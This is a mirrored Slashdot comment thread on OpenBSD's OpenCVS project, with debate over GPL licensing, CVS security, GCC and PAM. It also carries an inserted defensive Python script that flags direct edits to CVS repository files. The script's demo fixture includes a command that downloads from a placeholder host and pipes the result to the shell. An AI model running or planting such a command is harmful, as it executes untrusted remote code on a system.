Slashdot Mirror


New BSD licensed CVS replacement for OpenBSD

Jeferey Bakins writes "In an effort, by Jean-Francois Brousseau (jfb@openbsd.org), to rid the OpenBSD CVS tree of GPL'ed licensed code, OpenCVS is now officially part of the OpenBSD project. For more details, see the OpenCVS homepage; http://www.openbsd.org/opencvs/"

35 of 164 comments

  1. Re:That's great. . . but, um, why? by DrSkwid · · Score: 3, Insightful

    do we really need a CVS clone, where the only difference is the license?

    When the "we" is OpenBSD then the answer is yes.

    If you are not part of that "we" then the question is pointless.

    --
    There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
  2. Re:The battle continues... by DrSkwid · · Score: 3, Insightful

    It is not a debate.

    "do what thou wilt" is the OpenBSD creed and the GPL is incompatible with that, what's your problem ?

    --
    There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
  3. Re:Why ? by Anonymous Coward · · Score: 2, Insightful

    One step at a time. Their use of CVS is deeply ingrained at the moment. Rewriting a well-understood tool is one thing. Designing and implementing a new source-control tool is a much larger, riskier task.

  4. Re:The battle continues... by ObsessiveMathsFreak · · Score: 4, Informative

    There's no silver bullet for licences either. The OpenBSDers want their system licenced under their rules, and more power to them. They have to remove all GPL code to do this because the GPL is a more or less all-or-nothing free software licence.
    It's got nothing to do with evangelism, and all to do with practicality. You can't have bits and pieces of code GPLed and some not.

    Other licences are more flexible, but are less precise. I'll still be using the GPL for most of the code I write, because I want as many people as possible to use it, and be fully secure in doing so.

    --
    May the Maths Be with you!
  5. Re:The battle continues... by SirGeek · · Score: 3, Insightful
    There's no silver bullet for licences either. The OpenBSDers want their system licenced under their rules, and more power to them. They have to remove all GPL code to do this because the GPL is a more or less all-or-nothing free software licence.

    Then is OpenBSD going to stop using GCC? I mean, GCC is GPL, so it is using GPL software to create their system, right?

  6. Subversion by Ded+Bob · · Score: 2, Interesting

    I was about to ask why they did not use Subversion, but I searched Google and found it uses software licensed under at least the LGPL (neon). Of course, they could have just edited Subversion to use another HTTP library like Curl or fetch (at least on FreeBSD). Maybe this has been in the planning stages for awhile.

  7. Re:That's great. . . but, um, why? by Christopher+Cashell · · Score: 2, Insightful

    When the "we" is OpenBSD then the answer is yes.

    So the goal is to reimplement every piece of GPLed code, is that correct?

    Let me know when they've finished with their GCC, Gnome, and KDE replacements. I'm looking forward to trying them out in 2012.

    If you are not part of that "we" then the question is pointless.

    Ah, that's helpful. All of a sudden, I'm reminded of why I've never cared much for OpenBSD.

    You guys enjoy your "new" CVS. I'm going back to actually getting work done using the tools available to me, including new technology like Subversion, darcs, and arch, as well as legacy software like CVS.

    Ideology is great, but once I reach the minimum required level of freedom (for my definition of free (which tends to closely parallel the DFSG)), I'm more interested in pragmatism and getting things done.

    --
    Topher
  8. Re:Why ? by Anonymous Coward · · Score: 5, Informative

    Read again...

    While CVS has been a functional tool in simple use, it has quite some drawbacks. Everyone who has been in the CVS guts (believe me, I have) knows that it is essentially write-only code.

    It is quite buggy, albeit the bugs are in corner cases, not seldom noticed by people not using CVS massively. The CVS maintainers have been unwilling to accept bug reports (it may be a matter of opinion: "it's not a bug, it's a feature" has been heard). OpenBSD has had several local changes to cvs over the years.

    However, for the reason stated above (write-only code), we cannot trust the code enough. It has been one of the weakest spots of our system security-wise. CVS is also a network service; as such, it can put systems at potential risk, like all network services. We want to be able to put greater trust into this service. The people who think this is just license masturbation are wrong. It is nice to be able to free code, but the important thing is to secure it. GCC is not a network service. The GPL is not reason enough for us (yet .-) ) to rewrite it. Also, understandable code makes it easier to find and fix non-security bugs (but we like to look at all bugs as potentially exploitable ones .-)).

    Niklas Hallqvist (I don't care enough to create a /. account)...

  9. More than the license. by NickHolland · · Score: 3, Informative

    There is a lot more to this than the license, though the license alone would be more than sufficient to justify doing it. While it is true that CVS is typically a development tool, that is HARDLY the limit of its abilities. What if you want to use a modified CVS to track configuration changes in a non-open-source application? Oops! Can't do that with GPL'd CVS.

    CVS development has basically stalled for quite some time. It has reached a "good enough" state -- obviously, considering the number of projects that live off of it -- but there are still issues. Check the OpenBSD CVS commit logs, search for "cvs sucks" and other such non-positive reviews of CVS's operation.

    There is also the relative primitiveness of some aspects of CVS and its access rights. If you have access to the CVS repository, you can do anything with it... What if I'm not qualified to work in certain trees? What if I fat-finger an scp operation and upload a huge set of files into the CVS directory (no, I *don't* want to talk about it, but it's not a hypothetical concern! :). Then there is just plain simple security: nothing stops any person who has CVS access from being able to go in and directly edit the CVS repository files OUTSIDE the CVS system, leading to untracked changes in the tree.

    And that's hardly all the complaints... If you think "license" is the only difference, you obviously didn't read the goals page very carefully (or believed the one line summary :-)

    1. Re:More than the license. by Anonymous Coward · · Score: 2, Insightful

      You should really look at CVS code before saying something like that... it's mostly impossible to fix anything down there.

      and there are also some good reasons not to switch to subversion.

      You say it's the same developers as CVS ? well, big surprise, they produced another half-finished piece of software.

      When what you care about is not extended functionality, but robustness and speed, cvs does not fit the bill. Neither does subversion.

    2. Re:More than the license. by setagllib · · Score: 2, Insightful

      There's more to it than that, though. BSDs run on a "least surprise" tactic, whereby major systems shouldn't change unless there is something REALLY wrong. The BSDs have all used CVS right from the early versions, and can still be fetched this way. If any of them were to drop CVS support for Subversion, for instance, users would have to adapt, and with the significant user base of BSD, that's quite a disruption.

      An honest question: Can Subversion import a CVS history and all branches and everything else relevant without any need for hand-hacking? Because when you want to migrate decades of source to a new system and keep it in working order, you don't want to have to mangle every file by hand. If Subversion does this then it's not entirely impractical to implement it - but since the biggest TRIVIAL (can be fixed without disrupting user base's expectations) problems in CVS can be fixed with a compatible re-write, it makes sense to do it that way. In this regard I congratulate OpenBSD on yet another brilliant and far overdue idea.

      --
      Sam ty sig.
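The repository-access weakness NickHolland raises in comment 9 above (anyone with filesystem access to the repository can edit the `,v` files directly, outside CVS, leaving no commit record) admits a cheap partial detection. What follows is an added example, not code from OpenBSD, OpenCVS or GNU CVS. It rests on one property of the RCS file format that CVS stores: a commit always bumps the `head` revision declared at the top of the `,v` file, so a file whose bytes changed while `head` stayed the same was modified by something other than a commit. The sample `,v` contents, path names and the `demo()` scenario are constructed here for illustration and do not come from any real repository.

```python
"""Detect out-of-band edits to RCS ',v' files in a CVS repository.

Added example, not part of OpenBSD's, OpenCVS's or GNU CVS's code. The
check: snapshot (head revision, sha256) per ,v file, then diff two
snapshots. Same head but different bytes means the file changed without a
commit. Caveat: `cvs admin`, tagging and lock changes also rewrite the file
without bumping head, so treat hits as triage leads, not proof of tampering.
"""
import hashlib
import os
import re
from typing import Dict, List, Tuple

# Matches the 'head 1.2;' line of the RCS admin header.
HEAD_RE = re.compile(rb"^head\s+([0-9.]+)\s*;", re.MULTILINE)

Manifest = Dict[str, Tuple[str, str]]  # path -> (head revision, sha256 hex)


def rcs_head(data: bytes) -> str:
    """Return the head revision declared in a ,v file, or '' if none found."""
    m = HEAD_RE.search(data)
    return m.group(1).decode() if m else ""


def manifest_entry(data: bytes) -> Tuple[str, str]:
    return rcs_head(data), hashlib.sha256(data).hexdigest()


def manifest_from_contents(files: Dict[str, bytes]) -> Manifest:
    """Build a manifest from an in-memory {path: bytes} map (used by demo())."""
    return {p: manifest_entry(d) for p, d in files.items() if p.endswith(",v")}


def manifest_from_dir(root: str) -> Manifest:
    """Walk a repository on disk and record every ,v file under it."""
    out: Manifest = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(",v"):
                full = os.path.join(dirpath, n)
                with open(full, "rb") as fh:
                    out[os.path.relpath(full, root)] = manifest_entry(fh.read())
    return out


def diff_manifests(old: Manifest, new: Manifest) -> List[Tuple[str, str]]:
    """Classify each changed ,v file between two snapshots.

    new_revision : head bumped, consistent with a cvs commit
    out_of_band  : bytes changed but head unchanged, i.e. not a commit
    added/removed: file appeared or vanished (cvs add/remove do this too)
    """
    findings: List[Tuple[str, str]] = []
    for path in sorted(set(old) | set(new)):
        if path not in old:
            findings.append((path, "added"))
        elif path not in new:
            findings.append((path, "removed"))
        else:
            (h0, d0), (h1, d1) = old[path], new[path]
            if d0 == d1:
                continue
            findings.append((path, "new_revision" if h0 != h1 else "out_of_band"))
    return findings


def _rcs(head: str, body: str) -> bytes:
    """Constructed minimal ,v file (hypothetical, not from a real repository)."""
    return (
        f"head\t{head};\naccess;\nsymbols;\nlocks; strict;\ncomment\t@# @;\n\n\n"
        f"{head}\ndate\t2004.12.01.10.00.00;\tauthor jfb;\tstate Exp;\n"
        f"branches;\nnext\t;\n\n\ndesc\n@@\n\n\n{head}\nlog\n@rev\n@\ntext\n@{body}@\n"
    ).encode()


def demo() -> List[Tuple[str, str]]:
    """Constructed before/after scenario: one commit, one direct edit, one scp."""
    before = manifest_from_contents({
        "src/bin/ls/ls.c,v": _rcs("1.4", "int main(void) { return 0; }\n"),
        "src/etc/rc,v": _rcs("1.9", "#!/bin/sh\n"),
        "src/etc/motd,v": _rcs("1.1", "Welcome\n"),
    })
    after = manifest_from_contents({
        # legitimate commit: head went 1.4 -> 1.5
        "src/bin/ls/ls.c,v": _rcs("1.5", "int main(void) { return 1; }\n"),
        # stored text edited directly on the server; head still 1.9
        "src/etc/rc,v": _rcs("1.9", "#!/bin/sh\nftp -o - http://example.invalid/x | sh\n"),
        # untouched
        "src/etc/motd,v": _rcs("1.1", "Welcome\n"),
        # stray file dropped into the repository directory by a fat-fingered scp
        "src/etc/core,v": b"not an rcs file at all",
    })
    return diff_manifests(before, after)


if __name__ == "__main__":
    for path, kind in demo():
        print(f"{kind:13s} {path}")
```

In practice you would run `manifest_from_dir()` from a cron job against the repository root, store the manifest somewhere the repository's committers cannot write (otherwise the same person who edits a `,v` file can fix up the manifest), and page on any `out_of_band` finding. The `head` check is deliberately shallow: a full RCS parser could also hash only the delta text and ignore the `symbols` and `locks` sections, which would remove the tagging false positives noted in the docstring.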
  10. Article Summary Misleading by eviltypeguy · · Score: 5, Insightful

    I think the article summary is somewhat misleading, the front page of the project claims that OpenCVS is a result of the ongoing security vulnerabilities in the existing CVS project, which has grown stagnant:

    The OpenCVS project was started after discussions regarding the latest GNU CVS vulnerabilities that came out. Although CVS is widely used, its development has been mostly stagnant in the last years and many security issues have popped up, both in the implementation and in the mechanisms.

    Of course, I'm not going to be stupid enough to deny that there is a great probability that another unwritten motivating factor was to use a non-GPL licensed piece of software. But, I think time has proven that while OpenBSD may not be a very useable distribution from a common desktop end-user standpoint, a lot of very good portable, secure code has come out of the project. Since I have to continue to run CVS servers for some of the projects I host, I look forward to a secure portable CVS server that I can be more confident in.

    1. Re:Article Summary Misleading by evilviper · · Score: 2, Insightful
      while OpenBSD may not be a very useable distribution from a common desktop end-user standpoint

      I have no idea why people keep saying this. It's behind FreeBSD in the number of ports, but it still has all the major stuff available. Firefox, KDE, GNOME, etc. It's a bare Unix system, waiting to be made into anything you want it to be. How can it possibly be unusable for the same tasks that other Unix systems are usable for?

      Frankly, I find it to be a bit nicer than FreeBSD, and miles ahead of Linux, in that every device you plug-in will work immediately without problems, or will not work (because it's unsupported), rather than requiring you to load modules left and right, and change parameters, addresses, etc.
      --
      Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
    2. Re:Article Summary Misleading by setagllib · · Score: 2, Interesting

      There's a small thing holding back Net and OpenBSD (I'm an advocate of both, this isn't trolling, just an observation) which is lack of real kernel preemption in favor of clean, simple code. While you do get the most out of your cycles this way (and it shows on lower spec machines), even on higher end machines even moderate load (in my experience, any compile job, even -j1) can make the user interface very unresponsive.

      My worst experience (possibly made worse by flaky hardware) of this is NetBSD 2 a couple of days ago, doing a pkg_chk -u round that made my entire day consist of 10-second lag after typing things before they appeared, and almost having to resort to elinks because Firefox couldn't do anything useful. On a DESKTOP system, traditionally an interactive system, this is a Very Bad Thing, since it reduces productivity if the system is under any other load.

      The irony is that the Net/OpenBSD approach results in typically better server/overall performance, where 'responsiveness' isn't an issue, and hence they really do make great servers. The way people say "Net and OpenBSD are still for servers" has its truth, but you won't stop me using (at least) NetBSD on a desktop instead of Linux just for the peace of mind.

      If there's a clean and simple way to improve responsiveness without significantly hurting performance, it should be implemented. Apparently a new thread scheduler would be enough, but even that is quite a task.

      --
      Sam ty sig.
  11. that's not the goddamn point by Geekboy(Wizard) · · Score: 4, Insightful

    the point of opencvs isn't to randomly replace GPL'd code, but to provide a different implementation, that is free of bugs and security issues. he's also working on other features to make cvs server better, and more secure.

    1. Re:that's not the goddamn point by 0racle · · Score: 2, Insightful

      That was the portable OpenSSH, not native OpenSSH. OpenSSH on OpenBSD has had one problem in the past few years because all the parts that it requires are secure and audited. Porting OpenSSH to other platforms requires them to link to other libraries that have not been written as securely and very often never audited; therefore it's not a bug in OpenSSH so much as an unintended interaction because it is outside of its native environment.

      Rumor has it that you haven't had to update qmail or djbdns because those projects aren't exactly open to accepting bug reports or acknowledging the fact that there might be problems. I don't really know, I don't use either of them.

      --
      "I use a Mac because I'm just better than you are."
  12. Umm. No. by nenolod · · Score: 5, Insightful
    In an effort, by Jean-Francois Brousseau (jfb@openbsd.org), to rid the OpenBSD CVS tree of GPL'ed licensed code, OpenCVS is now officially part of the OpenBSD project. For more details, see the OpenCVS homepage; http://www.openbsd.org/opencvs/

    Umm. No. That's not what it's about at all. Let's correct the mistakes now, shall we?

    1) There was no OpenCVS until the OpenBSD project noticed some major security vulnerabilities posted to bugtraq in GNU CVS.

    2) The reason why OpenCVS was written was to provide a more secure client/server package than what the [now stagnant] GNU CVS project is currently providing. It has nothing to do with GPL vs BSD; in fact the OpenBSD project is all about what RMS calls "free software".

    So basically the Slashdot editors posted a troll to the front page. Beautiful. :)

    1. Re:Umm. No. by Nimrangul · · Score: 2, Informative
      ipf wasn't GPL. It was a screwed up altered version of the BSD license; Darren Reed said that people couldn't go changing his ipf around (OpenBSD wanted to integrate it into their kernel) so the OpenBSD developers got a new packet filter.

      This is different, yes OpenBSD developers are working at removing GPL tools, but that does not mean they aren't replacing things of other less-free origin.

      Replacing the GnuCVS with OpenCVS isn't just over a license; it is more that as long as they're doing such a massive undertaking, they may as well go a little further and start fresh with a better license.

      --
      I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
  13. Re:The battle continues... by Richard_at_work · · Score: 4, Insightful

    OpenBSD will stop using GCC when the Tendra Project has reached a satisfactory level of maturity. The OpenBSD team work under the premise that GPLed items are 'free enough for them' until a replacement can be found, just like Linus works under the same premise (see Bitkeeper).

  14. Re:That's great. . . but, um, why? by Anonymous Coward · · Score: 2, Insightful

    Ahem... cvs is a network service, gnome/kde are just desktop environments. OpenBSD is focussed on securing networks, yes? What makes you think that writing a more secure cvs is a waste of time? You talk about being pragmatic, but then you say everybody needs to start using subversion/darcs, so you must also think everybody must ditch Windows OS and use Linux instead? Well guess what, people are going to keep using the tools they already know and have invested much time in, so maybe it's good if somebody can fix these tools.

  15. Re:That's great. . . but, um, why? by SillyNickName4me · · Score: 2, Informative

    > No, it is foremost a licensing issue and you are being disingenuous saying otherwise.

    It is also a licensing issue.

    > You may call me impolite if you wish, but I am no more impolite than the insinuation that GPL'd CVS is somehow not FREE.

    It has a restriction. That restriction may serve a good purpose, but it is a restriction nonetheless and hence less free. Whether it is free enough or actually better or whatever is a matter of opinion. Calling it non-free is a bit too much imho, but calling it not free enough, well, I tend to agree there, but I accept that others don't. How difficult is it for you to do what you said and accept someone else's choice, even more when that someone is also prepared to do the work for it?

  16. Re:That's great. . . but, um, why? by Goo.cc · · Score: 4, Insightful

    You know, some people don't care for software that is encumbered by the GPL and it is perfectly reasonable to write a replacement for such software. Just because you don't agree doesn't make it wrong.

  17. Re:That's great. . . but, um, why? by Richard_at_work · · Score: 4, Insightful

    The thing that amuses me about this post is that someone probably said this exact thing way back in the 1980s when GNU put together the project to write their own C compiler, Unix replacement etc. When will people understand that some people view the GPL in the same manner as those GPL evangelists view commercial licenses - not free enough. Ideology is great, but you have to realise that everyone's ideological views are the same - an opinion, and yours may not be the same as mine.

  18. Re:The battle continues... by evilviper · · Score: 2, Informative
    Then is Open BSD going to stop using GCC ?

    Eventually, yes.

    With the general crappiness of GCC3, quite a few developers have been looking at Tendra. Licensing issues helped, but it's really how slow and buggy GCC3 has become that is driving people away.

    And before I get modded down as a pro-BSD troll, I'd like to say, you can hear the same complaints from plenty of Linux devs as well.
    --
    Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
  19. Re:That's great. . . but, um, why? by archen · · Score: 5, Interesting

    Let me know when they've finished with their GCC, Gnome, and KDE replacements. I'm looking forward to trying them out in 2012.

    Judging by this comment I'm guessing you haven't used any BSD variant. The idea isn't to reimplement EVERY piece of GPLed code, only the stuff in the BASE SYSTEM. It's hard for many Linux users to make that distinction, but in BSD you have the base operating system (that's more than the kernel) and the add-on software.

    Would you be happy using Linux if it had random things that had proprietary licences in it? Of course not. By the same token BSD is about being free via the BSD licence, it's really a snag when you have a mix of tools using BSD and GPL licences.

    I don't see stuff like GCC going away, but GCC isn't necessary for a functioning system so it can be torn out if someone doesn't need it. Most of the base system has GNU utilities in odd spots (tar was recently replaced in FreeBSD for instance). When all of this is said and done you know that the base system is BSD, and the rest of the software is whatever you stack on top of it - no confusion as to what is where.

  20. Re:That's great. . . but, um, why? by M1FCJ · · Score: 2, Funny

    Please pay $0.05 to read the rest of the comment.

  21. Re:That's great. . . but, um, why? by flynn_nrg · · Score: 2, Informative

    CVS is a solid piece of software

    No, it isn't. Development is not that active anymore, and the code is a total mess. Why? The networking portions are an afterthought, so there's a lot of duplicated code. It has tons of problems (ever tried renaming a file and keeping its history?). But it does the job, that's why a lot of people use it. The OpenBSD guys rely on CVS to do their job, but if it's an insecure piece of software then a replacement is very welcome.

    While I advocate OS, I settled on Perforce (free for 2 users/2 workspaces) for my home projects more than 2 years ago and never looked back.

    I say, kudos OpenBSD guys for doing this, it's a win-win situation.

  22. Why CVS? by chrysalis · · Score: 2

    I don't see the point.

    CVS was nice. But it has some very lousy limitations. Working with branches is a pain, and global revision numbers are really better than per-file revision numbers.

    Software like Arch or Subversion is not just an "alternative". It really solves issues that CVS has and will always have because of its design.

    It doesn't mean that CVS doesn't work. It works. Even very well and even for very large projects.
    But people who tried alternatives usually never switched back to CVS.

    --
    {{.sig}}
  23. Re:The battle continues... by setagllib · · Score: 5, Interesting

    Here's where I step in with a favorite URL - http://kerneltrap.org/node/view/4126 - wherein Linus himself points out that GCC 3.x is a generally worse C compiler, with some advantages in C++ compiling being its only real saving throws.

    While I can't honestly say BSD projects haven't come under the same kind of problems (FreeBSD 5, for instance, which at least right now isn't a pretty sight), the tendency is not to replace perfectly fine systems (like gcc 2.95's essential core, which was fast and light) with monstrosities (gcc 3.x). If something new is to be implemented, it has to be Right in design and in practice. If a BSD project wrote a compiler, it would be free, light, very UNIXy (functional, not kitschy), and few people would care because it's not GPL and anything non-GPL must be inferior, right? Some people...

    --
    Sam ty sig.
  24. Re:The battle continues... by dmiller · · Score: 2, Insightful

    gcc isn't perfect, but it isn't nearly as annoyingly bad as some of the other stuff we have to use. More importantly, it doesn't have to deal with untrusted network data (like cvs does).

    A BSD licensed cc would be nice, but an absolute crapload of work - especially renovating all those programs and ports that depend on gccisms (some of which are perfectly reasonable)

  25. Re:That's great. . . but, um, why? by Brandybuck · · Score: 2, Insightful

    do we really need a CVS clone, where the only difference is the license?

    If you would have bothered to read the article, instead of relying on the biased Slashdot blurb, you would have realized that licensing isn't even offered as a reason. Really it's not!

    For your edification, here is the complete stated rationale for OpenCVS: "The OpenCVS project was started after discussions regarding the latest GNU CVS vulnerabilities that came out. Although CVS is widely used, its development has been mostly stagnant in the last years and many security issues have popped up, both in the implementation and in the mechanisms."

    --
    Don't blame me, I didn't vote for either of them!
  26. Get your facts straight by dmiller · · Score: 3, Informative

    If the same class of people are doing opencvs then should we assume that the only safe environment to run opencvs will be OpenBSD, until otherwise proven?

    The "class of people" responsible for the bug in portable OpenSSH was me and nobody else - so please don't impugn the other OpenBSD developers.

    The fact that the 3.7.1 hole was not exploitable on OpenBSD was due to the fact that the bug related to PAM authentication, which OpenBSD doesn't use (for good reason).

    BTW, the bug was a logic error that could have been made in any language, so the standard Slashdolt cry of "C is insecure, use XXX" wouldn't have saved you.

  27. Reasons to hate PAM by dmiller · · Score: 3, Informative

    1) Poorly specified - there are several ambiguities in the spec, some with security implications if you get it wrong.

    2) Implementation differences between Linux-PAM, Sun PAM and OpenPAM - as a direct result of (1) above.

    3) Useless broken API which is completely blocking (i.e. it prompts for and expects to receive the password/response in a single function call) - making it near-useless for a network application without major trickery.

    4) Broken design that requires loadable modules which are encouraged by the API to pass opaque data behind the back of the calling application

    5) Total lack of separation between policy and mechanism - users are expected to configure policy by specifying which loadable modules are loaded using a silly and restrictive grammar.

    6) Zero standardisation for modules or their arguments. As a result, everyone implements things a little bit differently.

    Those are just the ones off the top of my head.

  28. Re:Two things that I don't get by OttoM · · Score: 2, Informative
    1st: OpenBSD is a developers' system. Having a source code control system is vital to that. Check the OpenBSD goals for details.

    2nd: It is a question of priorities. The OpenBSD project does not want such an important tool (and a networking tool as well) for their development to be of questionable quality. Other posts provide more info on why we think GNU CVS is a security hazard.

  29. Re:Two things that I don't get by setagllib · · Score: 3, Informative

    1: I explained this in another post, you must have missed it. The BSDs can have sources fetched via CVS (NetBSD recommends this way, rightly so), and having it in the base package makes this infinitely more convenient than having to install the gargantuan cvsup port or poking around for up-to-date-enough source tarballs once daily. Given the relatively small footprint of the CVS client, this convenience is well worth it.

      2: They don't have 'too much human resources', you're thinking of Linux. OpenBSD has clear goals and, yes, is motivated to achieve these goals. Security and freedom are goals; this project helps both. The BSDs don't "struggle hard" with manpower, they have as many developers as are needed; everything worth doing gets done. And having fewer developers is often better for coordination, which is why BSD code bases continue to be consistent and robust.

    --
    Sam ty sig.